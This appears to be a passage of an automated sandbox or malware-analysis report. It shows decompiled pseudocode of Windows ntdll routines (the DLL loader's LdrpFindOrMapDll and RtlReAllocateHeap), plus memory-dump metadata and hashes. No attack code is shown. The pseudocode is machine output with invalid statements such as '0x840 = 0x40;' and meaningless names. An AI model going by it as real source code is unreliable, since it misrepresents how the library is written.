												_t348 =  *((intOrPtr*)(_t347 + 0x28)) +  *((intOrPtr*)(_t421 - 0x1c));
												__eflags = _t348;
											}
											 *(_t418 + 0x1c) = _t348;
										}
										 *((intOrPtr*)(_t418 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 0x50));
										 *((intOrPtr*)(_t418 + 0x24)) =  *(_t421 - 0x34);
										 *((intOrPtr*)(_t418 + 0x28)) =  *((intOrPtr*)(_t421 - 0x30));
										_t91 = _t418 + 0x2c; // 0x2c
										_t401 = _t91;
										 *_t401 =  *((intOrPtr*)(_t421 - 0x48));
										 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t421 - 0x44));
										 *(_t418 + 0x34) =  *(_t421 - 0x24);
										 *((short*)(_t418 + 0x38)) = 0;
										 *((short*)(_t418 + 0x3a)) = 0;
										 *((intOrPtr*)(_t418 + 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 8));
										__eflags = 0;
										 *((intOrPtr*)(_t418 + 0x48)) = 0;
										 *((intOrPtr*)(_t418 + 0x4c)) = 0;
										_t104 = _t418 + 0x50; // 0x50
										_t319 = _t104;
										 *((intOrPtr*)(_t319 + 4)) = _t319;
										 *_t319 = _t319;
										_t106 = _t418 + 0x58; // 0x58
										_t320 = _t106;
										 *((intOrPtr*)(_t320 + 4)) = _t320;
										 *_t320 = _t320;
										_t108 = _t418 + 0x60; // 0x60
										_t321 = _t108;
										 *((intOrPtr*)(_t321 + 4)) = _t321;
										 *_t321 = _t321;
										 *((intOrPtr*)(_t418 + 0x68)) = 0;
										 *(_t418 + 0x6c) =  *( *((intOrPtr*)(_t421 - 0x20)) + 0x34);
										_t324 =  *0x7ffe0018;
										_t403 =  *0x7ffe0014;
										_t407 =  *0x7ffe001c;
										while(1) {
											__eflags = _t324 - _t407;
											if(_t324 == _t407) {
												break;
											}
											asm("pause");
											_t324 =  *0x7ffe0018;
											_t403 =  *0x7ffe0014;
											_t407 =  *0x7ffe001c;
										}
										 *((intOrPtr*)(_t418 + 0x70)) = _t403;
										 *((intOrPtr*)(_t418 + 0x74)) = _t324;
										_push(0);
										_push(4);
										_push(_t421 - 0x6c);
										_push(2);
										E00920060( *((intOrPtr*)(_t421 - 0x2c)));
										_t328 =  *(_t421 - 0x6c);
										__eflags = _t328;
										if(_t328 != 0) {
											_t119 = _t418 + 0x6c;
											 *_t119 =  *(_t418 + 0x6c) - _t328;
											__eflags =  *_t119;
										}
										_t121 = _t418 + 0x3c; // 0x3c
										_t414 = _t121;
										_t331 = 0xa04820 + (L0092FAC1(_t401) & 0x0000001f) * 8;
										_t405 =  *((intOrPtr*)(_t331 + 4));
										 *_t414 = _t331;
										 *((intOrPtr*)(_t414 + 4)) = _t405;
										 *_t405 = _t414;
										 *((intOrPtr*)(_t331 + 4)) = _t414;
										_t332 =  *0xa00210; // 0x282ad8
										 *_t418 = 0xa0020c;
										 *((intOrPtr*)(_t418 + 4)) = _t332;
										 *_t332 = _t418;
										 *0xa00210 = _t418;
										_t128 = _t418 + 8; // 0x8
										_t333 = _t128;
										_t402 =  *0xa00218; // 0x282ae0
										 *_t333 = 0xa00214;
										 *(_t333 + 4) = _t402;
										 *_t402 = _t333;
										 *0xa00218 = _t333;
										E009404F2(_t401, _t402, _t407, _t414, 0xa02200,  *((intOrPtr*)(_t418 + 0x18)),  *((intOrPtr*)(_t418 + 0x20)));
										E009402AC(_t402, _t418);
										__eflags =  *(_t421 - 0x58);
										if( *(_t421 - 0x58) != 0) {
											goto L73;
										} else {
											goto L45;
										}
									}
								}
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x00000004;
								__eflags =  *(_t421 + 0x18) - 0x40000003;
								if( *(_t421 + 0x18) == 0x40000003) {
									_t402 = _t421 - 0x34;
									_t411 = E0097A0F8(_t421 - 0x34, _t406,  *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x54)), _t303, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x10)));
									__eflags = _t411 - _t401;
									if(_t411 >= _t401) {
										goto L35;
									}
									goto L28;
								}
								goto L35;
							}
							__eflags =  *(_t421 + 0x14) & 0x00000002;
							if(( *(_t421 + 0x14) & 0x00000002) != 0) {
								goto L117;
							}
							_t402 = 0x2000;
							_t303 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *(_t303 + 0x16) & 0x00002000;
							if(( *(_t303 + 0x16) & 0x00002000) != 0) {
								L115:
								__eflags =  *(_t303 + 0x5e) & 0x00000080;
								if(( *(_t303 + 0x5e) & 0x00000080) != 0) {
									goto L33;
								}
								_t411 = 0xc0000428;
								goto L28;
							}
							__eflags = _t417 - _t401;
							if(_t417 == _t401) {
								goto L33;
							}
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) != 0) {
								goto L33;
							}
							goto L115;
						}
						_push(_t421 - 0x68);
						_push(_t401);
						_push(_t401);
						_push( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 8)));
						_push(3);
						E0092F535(0x4000000e, _t417, __eflags);
						_t355 =  *((intOrPtr*)(_t421 - 0x68));
						__eflags =  *((short*)(_t355 + 0x48)) - 3;
                                                                                                                                                    						if( *((short*)(_t355 + 0x48)) <= 3) {
                                                                                                                                                    							 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
                                                                                                                                                    							_push(_t421 - 0x50);
                                                                                                                                                    							_push(2);
                                                                                                                                                    							_push(_t421 - 0x40);
                                                                                                                                                    							_push(1);
                                                                                                                                                    							_push(1);
                                                                                                                                                    							_t411 = E00921614(0x4000000e);
                                                                                                                                                    							__eflags = _t411 - _t401;
                                                                                                                                                    							if(_t411 < _t401) {
                                                                                                                                                    								goto L28;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t421 - 0x50)) - 3;
                                                                                                                                                    							if( *((intOrPtr*)(_t421 - 0x50)) != 3) {
                                                                                                                                                    								goto L35;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *0xa00001;
                                                                                                                                                    							if( *0xa00001 != 0) {
                                                                                                                                                    								 *0xa09240 =  *0xa09240 + 1;
                                                                                                                                                    							}
                                                                                                                                                    							L27:
                                                                                                                                                    							_t411 = 0xc000007b;
                                                                                                                                                    							goto L28;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t421 - 0x5c)) - _t401;
                                                                                                                                                    						if( *((intOrPtr*)(_t421 - 0x5c)) != _t401) {
                                                                                                                                                    							_push( *((intOrPtr*)(_t421 - 0x1c)));
                                                                                                                                                    							E0091FC90(0xffffffff);
                                                                                                                                                    							E0091F9F0( *((intOrPtr*)(_t421 - 0x2c)));
                                                                                                                                                    							E0091F9F0( *(_t421 - 0x28));
                                                                                                                                                    							E0092E1C6(_t421 - 0x3c);
                                                                                                                                                    							_t410 = 0;
                                                                                                                                                    							E0092E025(_t402,  *0xa00104, 0,  *((intOrPtr*)(_t421 - 0x30)));
                                                                                                                                                    							_t401 = 1;
                                                                                                                                                    							L11:
                                                                                                                                                    							_t419 = E0092E825( *(_t421 + 8));
                                                                                                                                                    							__eflags = _t419 - 2;
                                                                                                                                                    							if(_t419 != 2) {
                                                                                                                                                    								L54:
                                                                                                                                                    								_t411 = L00941C26(_t402, _t406,  *(_t421 + 8), _t419, _t421 - 0x60,  *((intOrPtr*)(_t421 - 0x4c)), _t421 - 0x48, _t421 - 0x34, _t421 - 0x3c);
                                                                                                                                                    								__eflags = _t411;
                                                                                                                                                    								if(_t411 < 0) {
                                                                                                                                                    									__eflags = _t411 - 0xc0000135;
                                                                                                                                                    									if(_t411 == 0xc0000135) {
                                                                                                                                                    										__eflags = _t401;
                                                                                                                                                    										if(_t401 != 0) {
                                                                                                                                                    											_t411 = 0xc000007b;
                                                                                                                                                    										} else {
                                                                                                                                                    											L00957CC4( *(_t421 + 8));
                                                                                                                                                    											L00942D04(0xc0000135,  *(_t421 + 8), 0);
                                                                                                                                                    										}
                                                                                                                                                    									}
                                                                                                                                                    									goto L14;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags =  *(_t421 + 0xf);
                                                                                                                                                    								if( *(_t421 + 0xf) == 0) {
                                                                                                                                                    									L84:
                                                                                                                                                    									 *((intOrPtr*)(_t421 - 0x88)) = 0x18;
                                                                                                                                                    									_t416 = 0;
                                                                                                                                                    									 *((intOrPtr*)(_t421 - 0x84)) = 0;
                                                                                                                                                    									0x840 = 0x40;
                                                                                                                                                    									__eflags =  *0xa0924c;
                                                                                                                                                    									if( *0xa0924c == 0) {
                                                                                                                                                    									}
                                                                                                                                                    									 *((intOrPtr*)(_t421 - 0x7c)) = 0x840;
                                                                                                                                                    									 *((intOrPtr*)(_t421 - 0x80)) = _t421 - 0x3c;
                                                                                                                                                    									 *((intOrPtr*)(_t421 - 0x78)) = _t416;
                                                                                                                                                    									 *((intOrPtr*)(_t421 - 0x74)) = _t416;
                                                                                                                                                    									_push(0x60);
                                                                                                                                                    									_push(5);
                                                                                                                                                    									_push(_t421 - 0x94);
                                                                                                                                                    									_push(_t421 - 0x88);
                                                                                                                                                    									_push(0x100021);
                                                                                                                                                    									_t411 = L0091FD74(_t421 - 0x28);
                                                                                                                                                    									__eflags = _t411 - _t416;
                                                                                                                                                    									if(_t411 < _t416) {
                                                                                                                                                    										__eflags = _t411 - 0xc0000034;
                                                                                                                                                    										if(_t411 == 0xc0000034) {
                                                                                                                                                    											L88:
                                                                                                                                                    											_t411 = 0xc0000135;
                                                                                                                                                    											goto L31;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags = _t411 - 0xc000003a;
                                                                                                                                                    										if(_t411 != 0xc000003a) {
                                                                                                                                                    											goto L31;
                                                                                                                                                    										}
                                                                                                                                                    										goto L88;
                                                                                                                                                    									} else {
                                                                                                                                                    										_push( *(_t421 - 0x28));
                                                                                                                                                    										_push(0x1000000);
                                                                                                                                                    										_push(0x10);
                                                                                                                                                    										_push(_t416);
                                                                                                                                                    										_push(_t416);
                                                                                                                                                    										_push(0xf);
                                                                                                                                                    										_t411 = E0091FFB4(_t421 - 0x2c);
                                                                                                                                                    										__eflags = _t411 - _t416;
                                                                                                                                                    										if(_t411 < _t416) {
                                                                                                                                                    											__eflags = _t411 - 0xc0000017;
                                                                                                                                                    											if(_t411 != 0xc0000017) {
                                                                                                                                                    												__eflags = _t411 - 0xc000009a;
                                                                                                                                                    												if(_t411 != 0xc000009a) {
                                                                                                                                                    													__eflags = _t411 - 0xc000012d;
                                                                                                                                                    													if(_t411 != 0xc000012d) {
                                                                                                                                                    														 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
                                                                                                                                                    														_push(_t421 - 0x50);
                                                                                                                                                    														_push(1);
                                                                                                                                                    														_push(_t421 - 0x40);
                                                                                                                                                    														_push(1);
                                                                                                                                                    														_push(1);
                                                                                                                                                    														_t288 = E00921614(0xc000007b);
                                                                                                                                                    														__eflags = _t288;
                                                                                                                                                    														if(_t288 >= 0) {
                                                                                                                                                    															__eflags =  *0xa00001;
                                                                                                                                                    															if( *0xa00001 != 0) {
                                                                                                                                                    																 *0xa09240 =  *0xa09240 + 1;
                                                                                                                                                    															}
                                                                                                                                                    														}
                                                                                                                                                    													}
                                                                                                                                                    												}
                                                                                                                                                    											}
                                                                                                                                                    											goto L30;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags =  *(_t421 + 0x14) & 0x00001000;
                                                                                                                                                    										if(( *(_t421 + 0x14) & 0x00001000) != 0) {
                                                                                                                                                    											goto L19;
                                                                                                                                                    										}
                                                                                                                                                    										_t411 = L00941D44(_t402, _t421 - 0x3c,  *(_t421 - 0x28));
                                                                                                                                                    										__eflags = _t411;
                                                                                                                                                    										if(_t411 >= 0) {
                                                                                                                                                    											goto L19;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags = _t411 - 0xc0000225;
                                                                                                                                                    										if(_t411 == 0xc0000225) {
                                                                                                                                                    											goto L19;
                                                                                                                                                    										} else {
                                                                                                                                                    											_t401 = 0;
                                                                                                                                                    											goto L29;
                                                                                                                                                    										}
                                                                                                                                                    										goto L54;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t419 - 2;
                                                                                                                                                    								if(_t419 == 2) {
                                                                                                                                                    									goto L84;
                                                                                                                                                    								}
                                                                                                                                                    								_t376 = L0092FA50(_t421 - 0x48, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x1c)));
                                                                                                                                                    								__eflags = _t376;
                                                                                                                                                    								if(_t376 == 0) {
                                                                                                                                                    									goto L84;
                                                                                                                                                    								}
                                                                                                                                                    								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
                                                                                                                                                    								_t411 = 0;
                                                                                                                                                    								goto L31;
                                                                                                                                                    							}
                                                                                                                                                    							_t378 = L0092FA50(_t410,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
                                                                                                                                                    							__eflags = _t378;
                                                                                                                                                    							if(_t378 == 0) {
                                                                                                                                                    								goto L54;
                                                                                                                                                    							}
                                                                                                                                                    							goto L13;
                                                                                                                                                    						}
                                                                                                                                                    						goto L27;
                                                                                                                                                    					}
                                                                                                                                                    					L10:
                                                                                                                                                    					 *((intOrPtr*)(_t421 - 0x60)) =  *_t416;
                                                                                                                                                    					 *((intOrPtr*)(_t421 - 0x5c)) =  *((intOrPtr*)(_t416 + 4));
                                                                                                                                                    					 *((intOrPtr*)(_t421 - 0x4c)) =  *((intOrPtr*)(_t421 + 0x10));
                                                                                                                                                    					goto L11;
                                                                                                                                                    				}
                                                                                                                                                    			}















































                                                                                                                                                    0x0097fe0d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fe04
                                                                                                                                                    0x009585cb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x009585cb
                                                                                                                                                    0x0093ece1
                                                                                                                                                    0x0093ece6
                                                                                                                                                    0x0093ece9
                                                                                                                                                    0x0097fd7f
                                                                                                                                                    0x0097fd86
                                                                                                                                                    0x0097fdc2
                                                                                                                                                    0x0097fdc2
                                                                                                                                                    0x00940107
                                                                                                                                                    0x00940107
                                                                                                                                                    0x0094010c
                                                                                                                                                    0x00940110
                                                                                                                                                    0x00940123
                                                                                                                                                    0x00940123
                                                                                                                                                    0x0094013b
                                                                                                                                                    0x0094013d
                                                                                                                                                    0x0094013f
                                                                                                                                                    0x0097fdca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00940145
                                                                                                                                                    0x00940148
                                                                                                                                                    0x0094014b
                                                                                                                                                    0x0094014f
                                                                                                                                                    0x0097a0eb
                                                                                                                                                    0x00940155
                                                                                                                                                    0x00940155
                                                                                                                                                    0x00940158
                                                                                                                                                    0x0094015b
                                                                                                                                                    0x00944ebc
                                                                                                                                                    0x00940161
                                                                                                                                                    0x00940164
                                                                                                                                                    0x00940164
                                                                                                                                                    0x00940164
                                                                                                                                                    0x00940167
                                                                                                                                                    0x00940167
                                                                                                                                                    0x00940170
                                                                                                                                                    0x00940176
                                                                                                                                                    0x0094017c
                                                                                                                                                    0x0094017f
                                                                                                                                                    0x0094017f
                                                                                                                                                    0x00940185
                                                                                                                                                    0x0094018a
                                                                                                                                                    0x00940190
                                                                                                                                                    0x00940195
                                                                                                                                                    0x00940199
                                                                                                                                                    0x009401a3
                                                                                                                                                    0x009401a6
                                                                                                                                                    0x009401a8
                                                                                                                                                    0x009401ab
                                                                                                                                                    0x009401ae
                                                                                                                                                    0x009401ae
                                                                                                                                                    0x009401b1
                                                                                                                                                    0x009401b4
                                                                                                                                                    0x009401b6
                                                                                                                                                    0x009401b6
                                                                                                                                                    0x009401b9
                                                                                                                                                    0x009401bc
                                                                                                                                                    0x009401be
                                                                                                                                                    0x009401be
                                                                                                                                                    0x009401c1
                                                                                                                                                    0x009401c4
                                                                                                                                                    0x009401c6
                                                                                                                                                    0x009401cf
                                                                                                                                                    0x009401d2
                                                                                                                                                    0x009401d7
                                                                                                                                                    0x009401dd
                                                                                                                                                    0x009401e3
                                                                                                                                                    0x009401e3
                                                                                                                                                    0x009401e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fdd1
                                                                                                                                                    0x0097fdd8
                                                                                                                                                    0x0097fddf
                                                                                                                                                    0x0097fde6
                                                                                                                                                    0x0097fde6
                                                                                                                                                    0x009401eb
                                                                                                                                                    0x009401ee
                                                                                                                                                    0x009401f1
                                                                                                                                                    0x009401f2
                                                                                                                                                    0x009401f7
                                                                                                                                                    0x009401f8
                                                                                                                                                    0x009401fd
                                                                                                                                                    0x00940202
                                                                                                                                                    0x00940205
                                                                                                                                                    0x00940207
                                                                                                                                                    0x00940209
                                                                                                                                                    0x00940209
                                                                                                                                                    0x00940209
                                                                                                                                                    0x00940209
                                                                                                                                                    0x0094020c
                                                                                                                                                    0x0094020c
                                                                                                                                                    0x00940218
                                                                                                                                                    0x0094021f
                                                                                                                                                    0x00940222
                                                                                                                                                    0x00940224
                                                                                                                                                    0x00940227
                                                                                                                                                    0x00940229
                                                                                                                                                    0x0094022c
                                                                                                                                                    0x00940231
                                                                                                                                                    0x00940237
                                                                                                                                                    0x0094023a
                                                                                                                                                    0x0094023c
                                                                                                                                                    0x00940242
                                                                                                                                                    0x00940242
                                                                                                                                                    0x00940245
                                                                                                                                                    0x0094024b
                                                                                                                                                    0x00940251
                                                                                                                                                    0x00940254
                                                                                                                                                    0x00940256
                                                                                                                                                    0x00940266
                                                                                                                                                    0x0094026c
                                                                                                                                                    0x00940271
                                                                                                                                                    0x00940275
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00940275
                                                                                                                                                    0x0094013f
                                                                                                                                                    0x00940112
                                                                                                                                                    0x00940116
                                                                                                                                                    0x0094011d
                                                                                                                                                    0x0097a0bf
                                                                                                                                                    0x0097a0cf
                                                                                                                                                    0x0097a0d1
                                                                                                                                                    0x0097a0d3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097a0d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094011d
                                                                                                                                                    0x0097fd88
                                                                                                                                                    0x0097fd8c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fd8e
                                                                                                                                                    0x0097fd93
                                                                                                                                                    0x0097fd96
                                                                                                                                                    0x0097fd9a
                                                                                                                                                    0x0097fdae
                                                                                                                                                    0x0097fdae
                                                                                                                                                    0x0097fdb2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fdb8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fdb8
                                                                                                                                                    0x0097fd9c
                                                                                                                                                    0x0097fd9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fda4
                                                                                                                                                    0x0097fda8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0097fda8
                                                                                                                                                    0x0093ecf2
                                                                                                                                                    0x0093ecf3
                                                                                                                                                    0x0093ecf4
                                                                                                                                                    0x0093ecfe
                                                                                                                                                    0x0093ed01
                                                                                                                                                    0x0093ed03
                                                                                                                                                    0x0093ed08
                                                                                                                                                    0x0093ed0b
                                                                                                                                                    0x0093ed10
                                                                                                                                                    0x0097fd3c
                                                                                                                                                    0x0097fd42
                                                                                                                                                    0x0097fd43

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0&($8&($DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c$*(
                                                                                                                                                    • API String ID: 0-332062512
                                                                                                                                                    • Opcode ID: 2803da1ca647f202039cda85e6553aaabcc32cfee25f2fd9fe382a706495b854
                                                                                                                                                    • Instruction ID: 85170b96c5339c3d7ef38a739faa4ac2bdb0198bc5baab6d1690619a5d0ef1fd
                                                                                                                                                    • Opcode Fuzzy Hash: 2803da1ca647f202039cda85e6553aaabcc32cfee25f2fd9fe382a706495b854
                                                                                                                                                    • Instruction Fuzzy Hash: EB328C72900208AFDF21DFA4C885FEEBBB9BF88300F148426F959A72A1D7749945DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E009D1238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                    				signed int _t123;
                                                                                                                                                    				signed int _t124;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    				intOrPtr _t132;
                                                                                                                                                    				signed int _t145;
                                                                                                                                                    				signed int _t146;
                                                                                                                                                    				signed int _t147;
                                                                                                                                                    				intOrPtr _t151;
                                                                                                                                                    				intOrPtr _t163;
                                                                                                                                                    				signed int _t173;
                                                                                                                                                    				signed int _t174;
                                                                                                                                                    				signed int _t178;
                                                                                                                                                    				short _t184;
                                                                                                                                                    				signed int _t193;
                                                                                                                                                    				signed int _t194;
                                                                                                                                                    				intOrPtr _t197;
                                                                                                                                                    				intOrPtr _t219;
                                                                                                                                                    				short* _t233;
                                                                                                                                                    				void* _t246;
                                                                                                                                                    				intOrPtr _t248;
                                                                                                                                                    				signed int _t251;
                                                                                                                                                    				signed int _t253;
                                                                                                                                                    				signed int _t254;
                                                                                                                                                    				void* _t255;
                                                                                                                                                    				void* _t256;
                                                                                                                                                    
                                                                                                                                                    				_t246 = __edx;
                                                                                                                                                    				_push(0x18);
                                                                                                                                                    				_push(0x92d158);
                                                                                                                                                    				_t123 = L0092DF5C(__ebx, __edi, __esi);
                                                                                                                                                    				_t248 =  *((intOrPtr*)(_t255 + 8));
                                                                                                                                                    				 *((intOrPtr*)(_t255 + 8)) = _t248;
                                                                                                                                                    				 *((char*)(_t255 - 0x19)) = 0;
                                                                                                                                                    				 *(_t255 - 0x24) = 0;
                                                                                                                                                    				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
                                                                                                                                                    					 *(_t255 - 4) = 0;
                                                                                                                                                    					 *(_t255 - 4) = 1;
                                                                                                                                                    					_t232 = "RtlReAllocateHeap";
                                                                                                                                                    					_t124 = E009385CA(_t248, "RtlReAllocateHeap");
                                                                                                                                                    					__eflags = _t124;
                                                                                                                                                    					if(_t124 != 0) {
                                                                                                                                                    						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
                                                                                                                                                    						_t251 =  *(_t255 + 0x14);
                                                                                                                                                    						__eflags = _t251;
                                                                                                                                                    						if(_t251 == 0) {
                                                                                                                                                    							_t235 = 1;
                                                                                                                                                    							__eflags = 1;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t235 = _t251;
                                                                                                                                                    						}
                                                                                                                                                    						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
                                                                                                                                                    						__eflags = _t130 - _t251;
                                                                                                                                                    						if(_t130 < _t251) {
                                                                                                                                                    							L66:
                                                                                                                                                    							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t132 + 0xc);
                                                                                                                                                    							if( *(_t132 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E0097373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							_push( *((intOrPtr*)(_t248 + 0x7c)));
                                                                                                                                                    							E0097373B("Invalid allocation size - %x (exceeded %x)\n", _t251);
                                                                                                                                                    							E009D06F9(0);
                                                                                                                                                    							_t117 = _t255 - 0x24;
                                                                                                                                                    							 *_t117 =  *(_t255 - 0x24) & 0x00000000;
                                                                                                                                                    							__eflags =  *_t117;
                                                                                                                                                    							goto L71;
                                                                                                                                                    						} else {
                                                                                                                                                    							__eflags = _t130 -  *((intOrPtr*)(_t248 + 0x7c));
                                                                                                                                                    							if(_t130 >  *((intOrPtr*)(_t248 + 0x7c))) {
                                                                                                                                                    								goto L66;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *(_t255 + 0xc) & 0x00000001;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								E009222D0(__eflags,  *((intOrPtr*)(_t248 + 0xcc)));
                                                                                                                                                    								 *((char*)(_t255 - 0x19)) = 1;
                                                                                                                                                    								_t26 = _t255 + 0xc;
                                                                                                                                                    								 *_t26 =  *(_t255 + 0xc) | 0x00000001;
                                                                                                                                                    								__eflags =  *_t26;
                                                                                                                                                    							}
                                                                                                                                                    							E009D098E(_t235, _t246, _t248, 0);
                                                                                                                                                    							_t253 =  *((intOrPtr*)(_t255 + 0x10)) + 0xfffffff8;
                                                                                                                                                    							__eflags =  *((char*)(_t253 + 7)) - 5;
                                                                                                                                                    							if( *((char*)(_t253 + 7)) == 5) {
                                                                                                                                                    								_t253 = _t253 - (( *(_t253 + 6) & 0x000000ff) << 3);
                                                                                                                                                    								__eflags = _t253;
                                                                                                                                                    							}
                                                                                                                                                    							_t145 = L00960ED7(_t235, _t248, _t253, _t232);
                                                                                                                                                    							__eflags = _t145;
                                                                                                                                                    							if(_t145 == 0) {
                                                                                                                                                    								L52:
                                                                                                                                                    								_t146 =  *(_t255 - 0x24);
                                                                                                                                                    								__eflags = _t146;
                                                                                                                                                    								if(_t146 == 0) {
                                                                                                                                                    									L71:
                                                                                                                                                    									_t119 = _t255 - 4;
                                                                                                                                                    									 *_t119 =  *(_t255 - 4) & 0x00000000;
                                                                                                                                                    									__eflags =  *_t119;
                                                                                                                                                    									 *(_t255 - 4) = 0xfffffffe;
                                                                                                                                                    									E009D16C3();
                                                                                                                                                    									_t123 =  *(_t255 - 0x24);
                                                                                                                                                    									goto L72;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t146 -  *0xa07928; // 0x0
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									_t147 = E00938131();
                                                                                                                                                    									__eflags = _t147 & 0x00000800;
                                                                                                                                                    									if((_t147 & 0x00000800) == 0) {
                                                                                                                                                    										goto L71;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *(_t255 - 0x20) -  *0xa0792c; // 0x0
                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                    										goto L71;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags =  *((intOrPtr*)(_t248 + 0x80)) -  *0xa0792e; // 0x0
                                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                                    										goto L71;
                                                                                                                                                    									}
                                                                                                                                                    									_t151 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    									__eflags =  *(_t151 + 0xc);
                                                                                                                                                    									if( *(_t151 + 0xc) == 0) {
                                                                                                                                                    										_push("HEAP: ");
                                                                                                                                                    										E0097373B();
                                                                                                                                                    									} else {
                                                                                                                                                    										E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    									}
                                                                                                                                                    									_push(E009BF719(_t248,  *(_t255 - 0x20)));
                                                                                                                                                    									_push( *(_t255 + 0x14));
                                                                                                                                                    									E0097373B("Just reallocated block at %p to 0x%x bytes with tag %ws\n",  *(_t255 - 0x24));
                                                                                                                                                    									L58:
                                                                                                                                                    									E009D06F9(0);
                                                                                                                                                    									goto L71;
                                                                                                                                                    								}
                                                                                                                                                    								_t163 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    								__eflags =  *(_t163 + 0xc);
                                                                                                                                                    								if( *(_t163 + 0xc) == 0) {
                                                                                                                                                    									_push("HEAP: ");
                                                                                                                                                    									E0097373B();
                                                                                                                                                    								} else {
                                                                                                                                                    									E0097373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    								}
                                                                                                                                                    								_push( *(_t255 + 0x14));
                                                                                                                                                    								E0097373B("Just reallocated block at %p to %x bytes\n",  *0xa07928);
                                                                                                                                                    								goto L58;
                                                                                                                                                    							} else {
                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t255 + 0x10)) -  *0xa07928; // 0x0
                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                    									_t173 = E00938131();
